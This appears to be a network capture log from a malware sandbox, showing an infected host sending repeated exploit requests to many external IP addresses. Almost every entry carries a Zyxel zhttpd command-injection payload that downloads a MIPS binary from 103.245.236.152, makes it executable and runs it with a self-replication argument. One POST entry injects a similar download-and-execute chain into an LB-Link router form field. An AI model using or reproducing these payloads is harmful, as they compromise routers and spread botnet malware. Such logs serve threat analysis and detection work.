                                            Jan 14, 2024 15:50:57.818422079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9381192.168.2.235749859.222.50.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818481922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9382192.168.2.2342654212.83.117.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818499088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9383192.168.2.233321252.83.21.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818520069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9384192.168.2.2339268207.245.231.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818572044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9385192.168.2.234970031.177.234.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818599939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9386192.168.2.2339362133.48.201.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818624973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9387192.168.2.2340142178.47.60.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818669081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9388192.168.2.235157639.137.165.1748080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.339920044 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9389192.168.2.2352378222.251.255.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.819813967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9390192.168.2.235085445.197.174.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.819940090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9391192.168.2.2354536133.165.219.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820000887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9392192.168.2.2347306154.179.165.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820049047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9393192.168.2.234720869.213.149.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820092916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9394192.168.2.234856279.240.143.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820133924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9395192.168.2.2333246198.73.180.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820162058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9396192.168.2.2356458129.112.56.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820214033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9397192.168.2.235608244.235.38.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820264101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9398192.168.2.2345994213.205.210.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820317030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9399192.168.2.23507365.185.195.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820337057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9400192.168.2.235630634.199.223.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820383072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9401192.168.2.23348564.201.251.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820451975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9402192.168.2.2334286198.213.109.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820508957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9403192.168.2.2343932156.121.88.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820548058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9404192.168.2.2347552155.27.140.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820615053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9405192.168.2.2357452209.203.150.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820653915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9406192.168.2.234505084.62.3.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820688009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9407192.168.2.2351018174.16.239.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820764065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9408192.168.2.236094853.170.108.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820764065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9409192.168.2.2347826212.165.9.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820823908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9410192.168.2.2343758163.102.79.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820869923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9411192.168.2.233567685.44.98.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820949078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9412192.168.2.2352104203.173.180.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820966959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9413192.168.2.2358848189.132.180.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.820993900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9414192.168.2.2332986173.125.107.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821064949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9415192.168.2.2336182182.157.233.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821083069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9416192.168.2.233717096.102.91.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821149111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9417192.168.2.2350896190.156.209.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821182966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9418192.168.2.2338834124.198.166.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821235895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9419192.168.2.2337078129.143.174.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821274042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9420192.168.2.2341196212.87.151.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821314096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9421192.168.2.2356622207.131.171.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821335077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9422192.168.2.2360850102.17.149.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821358919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9423192.168.2.2359406162.68.19.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821424961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9424192.168.2.235880837.84.9.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821504116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9425192.168.2.233721269.18.130.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821515083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9426192.168.2.235366086.233.21.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821576118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9427192.168.2.2353820111.144.57.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821621895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9428192.168.2.2354224150.254.207.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821650028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9429192.168.2.2344354210.227.232.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821686029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9430192.168.2.236028478.47.61.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821739912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9431192.168.2.235656635.209.162.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821763039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9432192.168.2.234393049.63.139.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821835041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9433192.168.2.234382852.67.157.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821899891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9434192.168.2.2357246199.193.253.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821913958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9435192.168.2.2352178111.203.152.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.821947098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9436192.168.2.2359546155.51.182.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822001934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9437192.168.2.2356620212.32.125.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822058916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9438192.168.2.2356980218.201.69.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822088957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9439192.168.2.2355832128.177.109.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822143078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9440192.168.2.2359004192.126.166.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822187901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9441192.168.2.2351348196.69.65.1443
                                            TimestampBytes transferredDirectionData
